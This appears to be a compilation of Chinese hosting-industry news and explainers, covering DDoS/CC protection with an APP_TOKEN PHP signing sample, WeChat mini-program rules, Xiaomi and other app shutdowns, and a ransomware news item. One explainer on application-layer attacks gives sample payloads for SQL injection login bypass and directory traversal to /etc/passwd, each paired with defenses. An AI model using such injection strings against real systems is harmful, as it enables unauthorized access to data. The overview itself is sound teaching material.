目前比较流行的防御手段,价格较低,而且可自义CC规则,由于采用云集群的方式,天然防御DDOS攻击,一个节点被攻击挂了也可以快速切换成另一个节点,大大增加了黑客的攻击成本。 推荐产品: 如果只是被DDOS攻击,推荐使用百度云加速,价格便宜,防御好。相关链接 如果带有CC攻击,推荐使用京东云星盾,支持WAF自义规则,可有效拦截针对性的CC攻击。相关链接 #### 小程序被DDOS或者CC攻击了,该怎么办? 由于手机APP或者类APP 产品是无状态请求,如果攻击者通过抓包或者反编译掌握了APP接口地址或者接口格式,就可以进行DDos或者CC攻击。对于这类攻击,最大的难题在于如何识别真实的用户。为了解决类似问题,速度网络高防IP产品推出APP_TOKEN功能,可以实现针对APP或者小程序100%拦截DDOS和CC攻击,0误杀。 实现原理 APP 每次启动后,第一条请求 务必是向高防IP的校验地址发送一条请求,并 同步等待 返回结果,如果校验通过,则会将客户端IP放入白名单,并将请求回源,APP正常启动后,不用再次请求。 如果校验不通过,则返回403状态.表明该IP为恶意IP,不再回源。 如用户端更换IP,则需要重新发送验签请求。 接入准备 APP产品: 需要在APP产品的每次启动过程中增加一个请求,请求地址为:域名/app_token.ys?sign=AAA(AAA为具体的sign) 开启高防IP的APP_Token功能。 APP_Token功能操作流程 在”网站防护” 下某个域名的 “设置”,选择开启 通讯加密 功能 开启后,会在 “高防IP”->详细 中生成APP_TOKEN APP 发送请求,如果校验成功则返回true,失败返回403 APP_TOKEN的例外链接设置 APP_TOKEN 开启后,当有客户端请求时,必须先进行验签,通过后才能继续发送其他请求,否则就会被拦截。当用户端更换IP时,也需要进行再次验签。 但是对于某些链接url,如不希望受到上述规则的影响,则可以设置了APP_TOKEN的例外链接。在例外连接中的URI,不会受到APP_TOKEN规则影响。 强烈建议,该功能需谨慎使用,如发现例外链接中的URI 被CC攻击,请尽快进行移除。 设置方式和uri格式要求。 是URI而非带参数的URL,参数默认会被忽略。 签名规则和请求地址 请求地址:域名/app_token.ys?sign=AAA(AAA为具体的sign) sign规则:md5(日期+APP_TOKEN).日期格式为Y-m-d(如2020-12-07). 以下是使用PHP编写的签名规则和请求地址的实战代码: <?php // 定义APP_TOKEN define('APP_TOKEN', 'your_app_token'); // 获取当前日期 $date = date('Y-m-d'); // 根据签名规则生成签名 function generateSign($date, $appToken) { $signData = $date . APP_TOKEN; $sign = md5($signData); return $sign; } // 生成请求地址 function generateRequestUrl($sign) { $requestUrl = "http://example.com/app_token.ys?sign=" . $sign; return $requestUrl; } // 生成请求地址并输出 $sign = generateSign($date, APP_TOKEN); $requestUrl = generateRequestUrl($sign); echo $requestUrl; ?> 请确保将 'your_app_token' 替换为您自己的APP_TOKEN,并将 'http://example.com/app_token.ys' 替换为您实际的请求域名。这段代码将根据给定的日期和APP_TOKEN生成签名,然后将其用于构建请求地址并输出。 App小程序操作流程: 在 App.json 文件中设置 APP_Token。具体步骤如下: 打开小程序的项目目录。 找到并打开 App.json 文件。 在文件内找到 "page" 字段,配置小程序页面路径。 在 "window" 字段下添加 "app_token" 项目,并设置其值为你的 APP_Token。 完成以上步骤后,保存并关闭 App.json 文件。 #### 小程序违规一般有哪些违规 微信将近期处理的违规小程序公开展示,最近一周时间内,平台处理了六大类、共计 1961 个违规小程序。其中包括:违法类、外挂类、过度营销类、滥用分享类、类目不符类、iOS虚拟支付违规类。分别如下: 1、违法 违法类小程序主要包括:赌博类、非法套现类、色情类、非法交易类、售卖非法商品类、代开发票类。 此类小程序直接触及法律,微信处理方式是: 纯提供违规服务的帐号,一经发现将以永久封号处理并拉黑主体。 正常运营的小程序,如偶尔有页面涉及违法擦边行为,将先做出警告处理,如不整改将处理帐号“单页面内容”、分享功能等,多次违规未整改的帐号将被封号处理。 2、外挂 微信将外挂类产品定义为:使用或推荐、介绍使用外挂或其他违规第三方工具接入小程序服务,对小程序服务造成破坏的行为。常见的违规类目包括:游戏外挂、清粉外挂、刷量外挂等。 对于纯提供外挂类服务的产品,微信同样是以永久封号处理并拉黑主体,一经发现不支持解开。 3、过度营销 过度营销类产品是指,存在过度营销、展示或传播骚扰信息或垃圾信息等行为,对用户造成骚扰。常见的包括精品高仿、夸大营销、“丰减增壮性”类广告等。 微信对此类产品的处理方式同上。 4、滥用分享 滥用分享主要包括:阻断正常功能流程,强制要求分享后才能恢复功能使用的行为;分享时强制要求分享至群的才能分享成功的行为;分享后直接送现金红包、分享后直接送实物奖品的行为。 常见类型有强制分享动作、强制分享到群、利益诱导分享等。 对于此类行为的产品,微信处理方式相比前几种较为宽松,会“视情节严重对帐号进行分享能力封禁,下架直至封号处理”。如无“恶意对抗”行为,通常不会进行封号及拉黑处理。 5、类目不符 小程序当前所选类目与帐号所运营的服务内容不一致,或以修改或隐藏小程序的内容等方式避开、妨碍腾讯的发布审核。如:直播类小程序未选择社交-直播类目,视为类目不符。 其中,对于金融、医疗,社交,公益,政务民生,洗浴保健,时政信息,文娱-视频等关键类目不符的,一经发现则永久下架处理。其他类目不符的,给予 3 天整改警告,到期未整改则永久封禁“通过二维码打开小程序、被搜索、小程序内容分享”功能。 6、iOS虚拟支付 由于 iOS 端不支持虚拟支付,微信对于iOS端小程序购买非实物商品的管控较为严格。包括VIP会员、充值、录制课程、录制音频视频等虚拟产品,均在违规行列。 常见的iOS虚拟支付违规类型包括:付费解锁、付费购买虚拟道具、引导虚拟支付等。 微信对于此类问题产品的处理方式是,永久封禁iOS支付接口和用户搜索小程序功能,并给出下架 7 天限时整改通知。如到期未整改,则永封“iOS用户打开小程序”功能,届时iOS端将无法打开该小程序。 这是平台最关注的违规信息,也防范最多。从处理方式看,也非常严格。 那么用户呢?大家最讨厌什么? 我们干脆向老铁们询问了这个问题,收到了非常多反馈,简单梳理时,会发现这些用户最讨厌的行为多被归纳为如下方面: 1、骚扰用户:服务通知发送频率太高,或发送营销广告 这是我们收集到最多的反馈,模板消息类的服务通知具备小程序少有的推送和唤醒能力,常常被用来刺激用户回归。 如此前见实的一次深度对话中,有记录过创业者对这一功能的解读: 模板消息的关键在于需要有一个明确的事务处理。比如购买商品后物流发生了变化,可以通知,或者参加一个活动审核成功了可以通知。一定是具体的事务性动作,而不是用来做主动营销。必须要融入到它这个服务当中去,这样模板消息才对用户有意义。否则就是对用户的骚扰,被封杀也在情理之中。 由于平台难以第一时间界定和阻止,很多小程序还是贸然选择用这种方式去骚扰用户,引起了不少用户反感。 2、退款困难:购物后发现没有直接的退款入口 小程序的便捷特性,带动了社交电商的火爆。也因此衍生出一些退换货纠纷,有一些老铁反馈说,他们在一些小程序电商中根本找不到退款入口。 甚至在讨论中,还看到了一家比较头部的小程序电商团队,围绕他们的搜索关键词都指向如何退款、是不是骗局之类的疑问。 3、强制广告:广告位置挡住了下一步操作的按钮  投放广告是小程序主要获益方式之一,如何引导用户观看和点击也就成为很多运营考虑的事情。 一些小程序及小游戏团队在广告上其实非常克制,主体进程都可以让用户完全脱离广告。但另一个极端就是:很多产品想方设法诱导和强制用户去点击广告。 4、虚假信息:分享小程序卡片信息与实际不符 分享动作是小程序裂变的关键,为了提升分享页面的有效打开,一些团队在这里动起了心思。 相信大家都或多或少收到过这样的分享页卡,明明是一款小程序分享,卡片的标题和配图却是完全不相关的蹭热点信息,如高考题目、仿冒视频、红包字样等。老铁们在后台和群里讨论时,经常提到这个现象,让人哭笑不得。 5、强制及虚假分享:分享动作设计不合理 这和平台公开的信息很类似,小编这里就不重复了。 6、山寨横行:蹭热度产品难以鉴别 就在昨天,见实和一个创意游戏团队深度对话,对方一款新游戏APP不久前冲上苹果免费榜第一、第二的位置,尚未来得及改写成小游戏,没想到已有 200 多款连名字都类似甚至一样的抄袭者出现。 抄袭一直是被业界深恶痛绝的顽疾。由于仿制门槛不高,通常某一款或一个类型的作品火起来后,大量山寨游戏也快速出炉。山寨作品通常用混淆名称、关键词截流等方式出现在搜索界面,导致用户搜索时,常常打开的是粗制滥造的山寨作品,影响体验。 这些是老铁们在说起不爽时提到最多的现象之一。 小编梳理这些,本意是期望更多优质的小程序、小游戏出现。体验更好、质量更佳。这些小范围的讨论和征集,部分折射出用户的需求变化。 最后,值得一说的是,在近期展开的深度对话中我们能看到,许多团队采取了极度克制策略,连广告都尽可能减少,常见和规则允许的裂变策略也被摒弃,就是为了用户能非常爽地体验产品,类似现象正在变得越来越多。 #### 小米发布免费商用字体 MiSans L3 10 月 30 日消息,MiSans 是小米最新推出的定制免费可商用字体,它简化了字体出脚,合并笔画交界处以减少视觉负担,更利于屏幕显示。   这还是一款可变字体,支持多种字重,可满足不同场景需求。特别的是,MiSans 支持众多 OpenType 字体功能,设计师们可以通过这些功能满足更细腻的排版需求。   随着小米 HyperOS 澎湃系统的发布 ,小米设计团队也对原先提供的免费商用字体进行了更新。本次更新带来了大量生僻字支持,而且符合最新 L3 级别 GB18030-2022 国标。   据介绍,GB18030-2022 强制规范三个实现级别,于 2023 年 8 月 1 日起开始执行。实现级别 1 共 27584 个汉字;实现级别 2 包含实现级别 1 以及《通用规范汉字表》中的没有包含在实现级别 1 之内的编码汉字,共计 27780 个汉字;实现级别 3 包含实现级别 2 以及新标准件规定的全部汉字及表 3 中的康熙部首,总计 87887 个汉字,用于政务服务和公共服务的产品应满足实现级别 3 的要求。   小米表示,MiSans 包含级别 1 + 级别 2,而全新的 MiSans L3 则为级别 3 字库( #### 小米多看阅读因版权到期下架 App 内所有漫画资源 11 月 6 日消息,小米旗下阅读软件多看阅读现已发布《漫画资源下架说明》。 说明指出,由于版权到期,多看阅读下架 App 内所有漫画资源,已购买内容可正常阅读。同时,多看阅读为由此给用户带来的不便致歉。 多看阅读是由小米官方出品的移动阅读平台,支持 TXT、PDF 阅读,提供分页、笔记、书摘、注释、字典等多种阅读功能。 此外,小米去年 12 月还推出了多看电纸书 Pro。该产品采用纯平一体化设计,配备 7.8 英寸墨水屏,内置多看阅读,支持微信读书,拥有语音搜书功能。 作为小米曾经的老用户,主机吧表示,小米软件资源是非常少的,比如小米电视就因为电视资源少得可怜,基本上没什么可看的。 #### 小米快递关闭服务  12 月 20 日消息,据IT之家网友今日反馈,小米快递提示由于业务变动即将关闭服务。与此同时,小米智能助手寄快递页面也没有小米快递。 小米快递: 您好,因业务变动,从 2022 年 12 月 01 日 0 时起,本功能将关闭寄快递服务,12 月 23 日 0 时起,关闭寄件记录查询等全部功能,并关闭服务器,请及时保存相关信息,感谢您的支持。 IT之家此前报道过,小米快递是即点即用的快递服务平台,你可以在这里下单寄送,会为你智能匹配最优快递服务,你也可以自主选择心仪的快递服务。快递小哥会在约定时间上门取件。整合了顺丰速运、京东快递、韵达快递、货拉拉、百世快递、圆通快递等。 #### 小米有品有鱼宣布2022 年 3 月 17 日终止运营 1月17日消息:小米旗下新国货会员制电商平台有品有鱼宣布将于2022年3月17日终止运营。有品有鱼在其APP和官方小程序首页发出公告称,有效期内的有鱼会员将转化成为「小米有品UP会员」。 据了解,有品有鱼是小米有品在2019年推出的社交电商业态,「自购省钱、分享赚钱」的模式与市面上大部分分销型社交电商类似。根据其官网,有品有鱼依托小米生态链体系,主张用小米模式做生活消费品,涵盖家居、日用、餐厨、加点、智能、影音、服饰、出行、温床、健康、饮食、洗护、箱包、婴童等各大生活消费品品类。 #### 小米米聊要关闭了,将于2月19日停止服务 最终还是干不过微信 1月19日消息:据小米米聊官方团队表示,将在2021年2月19日12点00分停止米聊服务。从2月1日12点开始,米聊将停止账号注册和消息收发。 米聊官方提醒用户在停服前自行导出聊天记录及个人资料等信息(安卓 v8.8.70及以上版本支持批量导出),停服后将无法导出用户在米聊内的任何信息。 米聊是小米科技开发的即时通讯软件,于2010年12月推出,最初定位于跨平台、跨运营商的手机端短信工具,只要你的手机能上网,就可以使用免费的对讲机功能。在2013年12月中国IT研究中心一项调查指出,中国内地市场较受欢迎的流动通讯应用排名,主要是QQ和微信,其次是新浪微博、陌陌、米聊、连我等。 以下为米聊官方通告: 尊敬的米聊用户: 米聊自发布以来,深受大家的支持与喜爱,在此米聊团队深表感谢。因业务变动,我们将于2021年2月19日12点00分停止米聊的服务,具体时间安排如下: -2021年2月1日12点00分 : 停止账号注册、消息收发; -2021年2月19日12点00分:停止米聊登录,并关闭服务器,届时及以后将无法登录和使用米聊。 请用户在停服前自行导出聊天记录及个人资料等信息(安卓 v8.8.70及以上版本支持批量导出),停服后将无法导出用户在米聊内的任何信息。此外,我们为您提供服务时合法收集的相关信息,我们会根据国家法律法规及《米聊隐私政策》进行保存。保存期限后,我们将对您的个人信息进行删除或匿名化处理。 最后,感谢每一位米聊用户在过去的支持与陪伴,对于此次米聊的停服给大家造成的不便,我们深表歉意。未来,米聊团队也会努力为大家带来更多新的服务。 2021年1月19日 米聊团队 #### 小米被质疑“性能缩水” 4 月 4 日消息,3 月 28 日,Geekbench 的联合创始人 John Poole 在推特上声称,小米似乎在根据应用的名称来限制性能。Poole 表示,将 Geekbench 伪装成《堡垒之夜》,会导致小米 11 的单核性能得分下降 30%,多核性能得分下降 15%。 近日,媒体 Hardware Info 收到了小米关于该质疑的声明: 小米采用温度管理策略来确保最佳的产品体验,尤其是对于经常长时间使用的要求苛刻的 App。在许多设备中,我们提供了 3 种性能模式,允许用户在性能和能效之间调整平衡。在系统层面,所有与应用性能相关的优化都会权衡许多基本因素,例如功耗、性能和散热等。 IT之家此前报道,Poole 晒出了一份对比数据,从图表中可以看到,小米 11 的 Geekbench 伪装成《堡垒之夜》后,数据由原来的 1129 和 3714 降到了 791 和 3125。 此外,Poole 称当 Geekbench 伪装成《原神》后,也出现了类似的跑分降低。 今年 3 月份,基准测试应用 Geekbench 将一些三星 Galaxy S 系列手机(包括最新的 S22 系列)从名单中删除,原因是其游戏优化服务限制了手机 CPU 和 GPU 的性能。三星回应该问题时的说法是,这么做是为了增加续航和防止手机过热。 #### 小红书搜索量激增,逼近百度半壁江山 随着数字化时代的到来,搜索平台的竞争愈发激烈。据周天财经最新报道,小红书在2024年第四季度的日均搜索量已接近6亿次,相较于2023年年中的3亿次,增长势头迅猛。 在搜索行业中,日均搜索量是一个至关重要的指标,其重要性堪比电商行业的GMV(商品交易总额)。据业内人士估计,百度作为搜索巨头,其日均搜索量目前略高于10亿次,而小红书的搜索体量已经逼近百度的一半,显示出其在搜索市场中的强劲竞争力。 此外,小红书的数据统计显示,平台70%的月活跃用户都有搜索行为,三分之一的用户打开小红书的第一件事就是进行搜索,而高达90%的用户表示他们的消费决策会受到小红书搜索结果的影响。这表明小红书在用户心中的地位越来越重要,其搜索功能已成为用户日常生活中不可或缺的一部分。 彭博社昨日报道指出,小红书有望在2024年实现利润翻番,达到10亿美元以上(约合72.73亿元人民币),并可能在业绩亮眼之后进行IPO。这一消息无疑为小红书的未来发展增添了更多期待。 随着小红书搜索量的激增,其在搜索市场中的地位日益凸显,未来是否能够进一步挑战百度等传统搜索巨头,值得我们持续关注。在数字化转型的大潮中,小红书的崛起无疑为行业带来了新的活力和竞争格局。 #### 小红书海外火了 我们梦中的社交平台 今天一大早起来,很多玩小区书的网友发现小红书全是老外的视频, 不知道的还以为自己翻墙了呢。 打开评论区发现,大量全国各地网友,还有很多美国网友,不仅有中文评论,还有英文评论。 这是什么情况?难道小区书放开国际互联网了? 主机邦搜索后才发现,原来是TikTok于 美国将在 1 月 19 日被勒令其关闭了。作为替代品大量的美国用户流入了同样是中国社交APP的小红书,可以说小红书赶上了这泼天的富贵。 不仅如此,国内版抖音更是大量海外用户入驻,主机邦从来没有像今天这样感觉国内互联网真的接触全球了,这大概就是主机邦梦中的互联网社交平台吧。 不过,这里面其实有个问题,主机邦很好奇,根据国内《网络安全法》规定:国内社交平台要求用户通过真实身份信息认证后注册账号。 也就是说国外用户也是需要实名认证的,以主机邦的观察来看,这些海外用户肯定是没有做实名认证的,那么现在合规吗?还是说上面已经同意海外用户不需要实名认证也可以用国内社交平台了。 如果是这样的话,那实在是太好了,我们需要跟世界各地网友社交,不是吗? #### 小红是一家天猫专卖店的客服,某天消费者与小红聊天过程中表示自己岁数大了 淘宝售前咨询规范考试: 小红是一家天猫专卖店的客服,某天消费者与小红聊天过程中表示自己岁数大了,电脑用的不太懂,可不可以加微信付款购买,小红应该怎么做?   A消费者年岁高了可以理解,微信联系没有什么不可以,加消费者的微信继续沟通过即可 B不能加消费者的微信,因为天猫规则不允许与消费者通过旺旺以外的沟通工具聊天 C不能加消费者的微信,但是可以通过旺旺的在线视频与消费者交流 D不能加消费者微信,但是可以让消费者提供联系电话与消费者进行沟通 正确答案:BC 备注: 引导线下-在交谈中不能发手机号QQ等线下方式,只能从旺旺上沟通及在天猫商城下 订单支付后发货 #### 小道消息!百度云加速要出免备案版的啦 大家都知道使用百度云加速是需要域名备案的,这很影响了一些网站使用,比如一些小说网站是没备案的,所以考虑到这类用户问题百度云加速推出了海外版百度云加速,免备案,防御与加速。 线路估计是还是走CloudFlare,毕竟百度云加速海外节点都是与CloudFlare 合作的,所以节点不会有太大区别,功能应该是复刻CloudFlare的功能,进行中文化,让大家管理方便些。 至于价格主机吧了解到,海外版的价格是比国内的贵一些的。海外版上线应该在12月左右,最后怎么样,我们拭目以待吧!如有需要的可以联系我们购买!     #### 小鸟云管家:不错的傻瓜式windows建站环境集成工具 说到小鸟云估计很多人知道,云服务器提供商,主要提供高防云服务器。小鸟云的服务器好不好,这里主机吧不作评价,但小鸟云出的一个服务器管家倒是非常好用,他就是小鸟云管理。 这是一款运行在windows系统上的建站环境集成工具,可以很轻松的配置ASP、NET mssql、PHP mysql、FTP、PHPmyadmin等。 与其它集成工具相比,小鸟云管理还自带查看服务器性能,可以很轻松的查看服务器的CPU、内存、磁盘、网络流量等各项指标。 还能对服务器进行进行清理优化,扫描清理系统垃圾,提升运行运行速度,优化系统配置,加强系统安全性。 同样支持数据库管理,导入导出等功能。堪称主机版的电脑管家。有需要的朋友可以去试试。 官方地址https://www.niaoyun.com/cloudApp/ #### 就在今天宣布寻草记电商平台倒闭了 “寻草记”,这是一个2019年8月上线的明星电商app,这个平台最大的特点,也是最吸引用户的地方,就是“0元购”——Freebuy,用户在“寻草记”商城买东西,所支付的金额可以申请返还,时间由用户自己决定:你想自己的钱早点回来就多支付一些订金给平台。这个平台唯一的要求,就是你在它的商城买一件东西时,先要支付给平台差不多100倍的订金,然后平台在一定时间将钱全部退还给你。 比如说,你要在“寻草记”商城买一个334元的运动椅,需要先付给平台33400元,然后平台最短半个月将33400元全部返给你,等同于自己免费拿到了334元的商品。   这看起来对用户血赚呀,有人担心万一平台不还你怎么办?我们先了解下平台背景,寻草记”商城的实控方是新三板挂牌公司——北京九天云竹信息技术股份公司(云竹信息,837939),实力股东有上海证券、东方财富证券、华金证券、联储证券、华信证券、东莞证券、中盛基金、小微互联投资、火烧云投资等,这些机构最不缺的就是钱! 但由于玩法类似于传销性质,寻草记商城所在的北京维引力公司已于2020年10月13日被列入被执行人,执行标的16518元;2020年11月13日,该公司前法人陈金玲还被列入限制消费令!   目前寻草记电商平台已正式宣布关停,那些把身家投进去的同学要血亏了! 所以大家这里提醒大家天下没有免费的午餐。 #### 属于应用层的攻击有哪些?盘点应用层攻击类型及防御策略 应用层攻击主要针对网络模型中的应用层(OSI模型的第7层或TCP/IP模型的应用层),这些攻击通常利用应用程序的逻辑漏洞、协议缺陷或配置错误来实施。以下是一些常见的应用层攻击类型及其简要说明: 1. SQL注入(SQL Injection) 原理:攻击者通过输入恶意SQL代码,操纵应用程序的数据库查询,从而窃取、篡改或删除数据。 示例:在登录表单中输入 ' OR '1'='1 绕过身份验证。 防御:参数化查询、输入验证、ORM框架。 2. 跨站脚本攻击(XSS, Cross-Site Scripting) 原理:攻击者在网页中注入恶意脚本(如JavaScript),当其他用户访问时触发,窃取Cookie或会话信息。 类型: 存储型XSS:恶意脚本存储到服务器(如评论区)。 反射型XSS:通过URL参数传递恶意脚本。 防御:输入过滤、输出编码、设置HTTP头(如Content-Security-Policy)。 3. 跨站请求伪造(CSRF, Cross-Site Request Forgery) 原理:诱使用户在已登录状态下执行恶意请求(如转账、修改密码)。 示例:通过钓鱼邮件诱导用户点击伪造的请求链接。 防御:使用CSRF Token、验证请求来源(Referer检查)。 4. 远程代码执行(RCE, Remote Code Execution) 原理:利用应用程序漏洞执行攻击者指定的任意代码,完全控制服务器。 案例:Log4j漏洞(CVE-2021-44228)允许通过日志输入触发代码执行。 防御:及时更新补丁、输入过滤、最小化权限。 5. 文件包含攻击(LFI/RFI) 原理: 本地文件包含(LFI):包含服务器本地敏感文件(如/etc/passwd)。 远程文件包含(RFI):加载远程恶意文件并执行。 防御:禁用动态文件包含、白名单限制文件路径。 6. 目录遍历(Directory Traversal) 原理:通过构造特殊路径(如../../)访问服务器上的未授权文件。 示例:http://example.com/file?name=../../etc/passwd 防御:规范化路径、限制文件访问权限。 7. HTTP Flood攻击(DDoS应用层) 原理:通过大量合法的HTTP请求耗尽服务器资源(如登录、搜索接口)。 防御:速率限制、WAF(Web应用防火墙)、CDN过滤。 8. XML外部实体注入(XXE, XML External Entity) 原理:利用XML解析器加载恶意外部实体,读取文件或触发SSRF。 示例:通过上传恶意XML文件读取服务器文件。 防御:禁用外部实体解析、使用JSON替代XML。 9. 不安全的反序列化(Insecure Deserialization) 原理:反序列化恶意数据时触发代码执行或逻辑漏洞。 案例:Java反序列化漏洞(如Apache Commons Collections)。 防御:验证序列化数据、使用安全的序列化库。 10. API滥用攻击 类型: 未授权访问:API接口缺乏身份验证(如暴露数据库的API)。 数据过度暴露:API返回过多敏感信息。 速率限制绕过:暴力破解密码或API密钥。 防御:OAuth/JWT认证、输入验证、限流。 11. 服务器端请求伪造(SSRF, Server-Side Request Forgery) 原理:诱使服务器向内部或第三方系统发送恶意请求。 示例:利用URL参数让服务器访问内网资源(如http://internal-server/admin)。 防御:过滤用户输入的URL、禁用非必要协议(如file://)。 12. 身份验证与会话攻击 类型: 暴力破解:尝试大量密码组合。 会话劫持:窃取Cookie或Session ID。 凭证填充:利用泄露的密码库撞库。 防御:多因素认证(MFA)、强密码策略、会话超时。 13. 点击劫持(Clickjacking) 原理:通过透明iframe覆盖诱使用户点击恶意按钮(如隐藏的“转账”按钮)。 防御:设置HTTP头X-Frame-Options: DENY。 14. 钓鱼攻击(Phishing) 原理:伪造登录页面或邮件诱导用户提交敏感信息。 防御:用户教育、SPF/DKIM邮件验证、HTTPS。 防御通用策略 输入验证与过滤:对所有用户输入进行严格检查。 最小权限原则:限制应用程序和用户的权限。 定期更新与补丁:修复已知漏洞(如CVE)。 安全工具:使用WAF、IDS/IPS、漏洞扫描器。 日志与监控:实时检测异常行为。 应用层攻击因直接针对业务逻辑,危害性极大。防御需结合安全开发(如SDL)、持续监控和用户教育。 #### 巨坑!西部数码服务器使用CDN必须把域名转入他们平台 最近,有位客户在使用了百度云防护后,提示无法访问! 查看后,是备案阻断了,原因是客户使用了百度云防护,属于第三方CDN,西部数码要求接入第三方CDN的域名必须入库或者转入他们平台! 这个规定简直巨坑,强制用户同时使用他们的服务器和域名,这是目前主机帮知道的服务商中,唯一一家这么干的,简直离谱。 #### 已上线 7 年多的腾讯 NOW 直播宣布 12 月 26 日停止运营 12 月 5 日消息,腾讯 NOW 直播今日发布公告,由于业务调整 ,NOW 直播将于 2023 年 12 月 26 日 11 时 00 分停止运营。 腾讯 NOW 直播是腾讯旗下直播 + 短视频 + 交友社交平台,于 2016 年上线,如今已运营 7 年多。2017 年,腾讯 NOW 直播在北京召开年度战略发布会,计划投入二十亿(包含十亿元专项资金和价值十亿的腾讯资源),助力优质原创内容的创作,并对其生产者进行奖励。直到 2023 年 10 月,腾讯 NOW 直播 App 还进行过更新。 官方今日公告称,即日起,NOW 直播将停止新用户注册及充值服务,NOW 直播网页端产品服务停止运营;已有账号的用户仍可正常登录 NOW 直播 App 并消费个人账户内的余额。 平台 NOW 红包活动及 NOW 直播活跃任务活动将于 2023 年 12 月 11 日 11 时 00 分下线。即日起至 2023 年 12 月 26 日 11 时 00 分正式停运前,用户仍可根据相关活动规则要求正常提现红包奖励。 2023 年 12 月 26 日 11 时 00 分正式停运后,所有用户将无法继续使用 NOW 直播产品服务,用户需要尽快保存好个人所需资料(如关注列表、消息记录等)。 #### 已停止运营的聚合搜索引擎F搜被360起诉索赔500万元 近日,目前已停止运营的聚合搜索引擎F搜的开发者发帖称,F搜被360起诉索赔500万。   F搜主要是通过调用谷歌和必应的搜索结果,并通过自己的算法进行整理,帮助用户快速找到需要的内容并清理一些垃圾站点。   在2022年的时候F搜域名被暂停解析,最终结果是F搜停止运营。(猜测应该是因为内容过滤问题被上面要求停止解析) 开发者称,360一共提出了四项诉求:   1. 判令两被告立即停止涉案不正当竞争行为,即停止实时访问、抓取、储存并使用原告的360图片搜索数据。   2. 判令被告一在F搜网站(网站早已关闭)、F搜官方微信公众号(F搜并没有微信公众号)、官方新浪微博的显著位置刊登声明消除影响,声明的刊登时间不少于30日,字体大小为五号,显示范围为全国。   3. 判令两被告连带赔偿原告经济损失及合理开支共计人民币500万元。   4. 请求判令两被告承担本案全部诉讼费用。 开发者表示:“咨询了一圈,这一方面好的律师估计诉讼成本总的下来需要1-2年和100-200万,当时F搜也没有奔着赢利的目的去的,所以无法承担这个成本。”   那F搜到底有没有抄袭360呢,根据开发者说明,360的起诉完全属于子虚乌有的事情,源代码可以证明F搜的搜索结果都来自必应和谷歌。  不过有网友评论称:“卖会员盈利已经实锤了,接下来有没有爬数据恐怕也很难说,360虽然是流氓起家但它们的法务显然不太可能无中生有,建议楼主还是和律师好好商量怎么和解吧,500万赔偿肯定有谈判拉扯的空间。” 主机帮认为非法抓取搜索引擎内容是违法的,这点早有案例了,就是不知道F搜有没有真的抓取360搜索引擎的内容呢?这点主机帮很好奇,因为作为站长,主机帮知道360的搜索内容其实很垃圾,几乎满屏广告,作为开发者没必要抓取360内容的,抓取搜狗都比360内容好。 这里还有一点是F搜早就停了,法院如何判定责任呢?要知道F搜2022年就停止运营了,360这个点再来起诉,拿出来的证据能证明吗?毕竟主体已经不在了,怎么证明你的内容是真的呢? 其实以主机帮多年的经验来看,500万是不可能的,这种一般都是原告为了提高被告请律师的门槛,因为一般律师接单子都是按被告的索赔的价格来算的,只要你不请律师,基本上都是输的。这种官司就算输,估计法院也不会真判赔500万,顶多十几万都算高了,当然啦,如果你利用他们数据赚了很多钱或者对他们经济造成很大的损失这个就另当别论了。 #### 巴黎迪士尼乐园遭勒索软件黑客组织 Anubis 入侵 据外媒HackRead 6月27日报道,勒索软件黑客组织“阿努比斯”(Anubis) 近日在其暗网网站宣称,已成功入侵巴黎迪士尼乐园 (Disneyland Paris),窃取了约 64GB 的内部数据。 黑客公布的信息显示,被盗数据包含约 3.9 万份游乐园工程文件,涉及“冰雪奇缘”、“加勒比海盗”、“巴斯光年”以及云霄飞车 Crush's Coaster 等多个热门游乐设施的建造与翻新计划细节。目前尚不清楚这些泄露数据中是否包含员工或游客的个人敏感信息。 报道指出,Anubis 组织并非直接攻破巴黎迪士尼自身的系统,而是通过入侵其某家合作公司间接获取了这些文件。截至目前,巴黎迪士尼乐园官方尚未就此事发表任何公开声明,因此外界也无从得知 Anubis 是否已向迪士尼提出赎金要求。 背景:活跃的Anubis组织 Anubis 组织近期活动频繁,主要活跃在地下黑客论坛 RAMP 和 XSS。该组织采用分工协作模式,广泛招募三类合作伙伴: 网络渗透者: 负责寻找并利用企业网络的初始入侵点。通过这种模式,不同团队按利润分成协作,构建了一个高度专业化的勒索攻击网络。 攻击执行者: 负责实施具体的勒索软件攻击。 谈判勒索者: 专门负责与受害者谈判、施压以获取赎金。 #### 币圈割韭菜事件:DeFi100项目卷款2亿跑路 数字货币以去中心化为特点,很多人将之视为一场革命,然而没有中心化的后果也很严重,运营者随时可能赚一把就消失,现在DeFi100项目运营者就坑了投资者2亿跑路了。DeFi100 是币安智能链上的一个去中心化弹性合成资产指数产品,由匿名团队开发,现在出问题了。 据报道币安智能链(BSC)上的 DeFi协议DeFi100官方网站已经无法访问,此前推特用户Mr. Whale指出该项目或为一场骗局,大约有3200万美元(约合2亿元人民币)的用户资金被团队卷走跑路。 更气人的是,约10个小时之前,DeFi100官方网站上出现“我们骗了你们,你们拿我们没办法”的字样,该页面随后被删除。 目前DeFi100项目网站已经无法访问,尚不确定是网站被黑或项目团队自己关闭网站。 #### 币安深夜遭大规模攻击中止提现,现已恢复 3 月 8 日消息  日前,加密货币交易平台币安因遭到大规模攻击,出现了不正常的交易行为,为此币安中止提现需求,目前已经恢复提现。 今天凌晨三点,币安官微发文表示,Binance有一些不正常的交易行为触发风控系统,在此之前,一些账号可能被钓鱼网站所盗,并强调所有资金都是安全的。 今天早晨,币安发布了系统恢复提现公告表示,Binance目前已经回滚所有异常交易,提现功能已经恢复。 面临本次大规模的攻击,Binance风控系统及时监控到异常,并锁定了提现需求,阻止盗币行为,反向锁定 31 个账户,攻击者在本次尝试中被Binance冻结了大量资产,Binance将对本次遭受的攻击发布更为详细的说明。 以下为公告全文 #### 布局搜索引擎 字节跳动投资互动百科 8月19日 消息:8 月 14 日,互动百科的运营主体“北京互动百科网络技术有限公司”进行了新一轮的工商信息核准,字节跳动成为了其新增法人股东,持股比例约为22.2%。企查查数据显示,字节跳动的投资实体——北京量子跃动科技有限公司的最新认缴出资额为871. 4286 万元,而互动百科的注册资本则在 7 月 5 日从 3050 万元增至3921. 4286 万元,该差额即为字节跳动出资额。 目前,互动百科创始人兼董事长潘海东在互动百科的持股比例为14.96%,低于字节跳动22.2%的持股比例,字节跳动已经成为了互动百科的第一大股东。 此前,有消息称,字节跳动疑接近完成了对互动百科的全资收购谈判。字节跳动也将继续完善搜索领域生态,布局产业链。 对此,字节跳动方面回应称,对市场传言不予置评。 7 月 31 